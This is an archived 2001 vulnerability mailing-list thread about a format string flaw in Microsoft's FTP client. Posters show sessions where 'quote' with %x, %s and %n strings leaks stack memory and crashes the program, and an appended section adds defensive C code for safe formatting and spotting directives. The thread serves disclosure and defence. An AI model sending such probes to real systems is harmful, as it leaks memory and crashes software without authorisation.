Vulnerability Development mailing list archives
Re: Microsoft FTP Program
From: "Eric D. Williams" <eric () INFOBRO COM>
Date: Fri, 23 Mar 2001 09:03:26 -0500
While this may work on newer versions of the FTP server (that link to inetinfo) it seems older versions (3.51) are not vulnerable. Interesting, output from the 500 response may be worth a little exploration though.

220 server Windows NT FTP Server (Version 3.51).
230 Anonymous user logged in as ftp (guest access).
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500 '0x16382d0.0x16394d0.0x0.0x78257830.0x2578302e.0x78302e78.0x302e7825.0x2e782578': command not understood
ftp> quote %s
500 'ic?'': command not understood
ftp> quote %n
500 '': command not understood
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
.
..
pub
Security
users
226 Transfer complete.
39 bytes received in 0.00 seconds (39000.00 Kbytes/sec)
ftp> quit

Eric Williams, Pres.
Information Brokers, Inc.
Phone: +1 202.889.4395
Fax: +1 202.889.4396
http://www.infobro.com/
mailto:eric () infobro com
For More Info: info () infobro com
PGP Public Key http://new.infobro.com/KeyServ/EricDWilliams.asc
Finger Print: 1055 8AED 9783 2378 73EF 7B19 0544 A590 FF65 B789

On Wednesday, March 21, 2001 7:48 AM, SteeLe [SMTP:steeLe () PRIVACYX COM] wrote:
While playing around in the Microsoft FTP program that came with Windows 98 I came across the following:

Connected to l33t host.
220 FTP server (Version 6.00LS) ready.
User (somewhere()): ftp
331 Guest login ok, send your email address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> quote
Command line to send
Usage: quote line to send.
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500 '0X7800BB4B.0X10072B8.0X1008820.0X0.0X56F3E8.0X78257830.0X2578302E.0X78302E78': command not understood.
ftp> quote %s
500 '+(|X+++YX++_ZX++|QX+++VX++ÇQX++êSX+++¦X++_ÄX++4òX+++òX++- VX+++V X+++VX+J_0___T__¦W_Y__T_Uï_QQVW+-¦XH': command not understood.
ftp> quote %n

And that crashed the program......

FTP caused an invalid page fault in module KERNEL32.DLL at 0167:bff9d709.
Registers:
EAX=c00300f0 CS=0167 EIP=bff9d709 EFLGS=00010216
EBX=00000000 SS=016f ESP=0052feb8 EBP=00530154
ECX=00000000 DS=016f ESI=00690100 FS=1c2f
EDX=780376e8 ES=016f EDI=01001550 GS=0000
Bytes at CS:EIP:
53 8b 15 dc 9c fc bf 56 89 4d e4 57 89 4d dc 89
Stack dump:

I do know that the ftp program in most Linux distros had this problem a while back but who knew it would pass on to Windows. Might not be important but someone should comment on this :)

SteeLe
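
Added example, not part of either post and not code from any FTP client or server: both transcripts show `%x` directives typed after `quote` coming back expanded in the 500 reply, which is the signature of a user-supplied line being used as a printf format string. The sketch below shows the hardened call shape and a small audit helper for spotting conversion directives in untrusted text; `format_command`, `build_quote_command` and `count_directives` are hypothetical names.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a client's printf-style "send command" routine. */
static int format_command(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, outlen, fmt, ap);   /* formats instead of sending */
    va_end(ap);
    return n;
}

/* Hardened call: the user's line is an argument, never the format string.
 * The defect pattern would be format_command(out, outlen, user_line). */
int build_quote_command(char *out, size_t outlen, const char *user_line)
{
    return format_command(out, outlen, "%s\r\n", user_line);
}

/* Audit helper: count printf conversion directives in untrusted text.
 * "%%" is a literal percent sign. *has_n is set when a %n (memory write)
 * directive is present. */
int count_directives(const char *s, int *has_n)
{
    int count = 0;
    *has_n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        s++;
        if (*s == '%')
            continue;                              /* literal percent */
        s += strspn(s, "-+ #0");                   /* flags */
        s += strspn(s, "0123456789*");             /* width */
        if (*s == '.')
            s += 1 + strspn(s + 1, "0123456789*"); /* precision */
        s += strspn(s, "hlLqjzt");                 /* length modifiers */
        if (*s == '\0')
            break;                                 /* truncated directive */
        if (strchr("diouxXeEfFgGaAcspn", *s)) {
            count++;
            if (*s == 'n')
                *has_n = 1;
        }
    }
    return count;
}
```

With the hardened call, the line typed after `quote` reaches the wire byte for byte, so a reply that echoes it back would show the literal `%x` text rather than stack values.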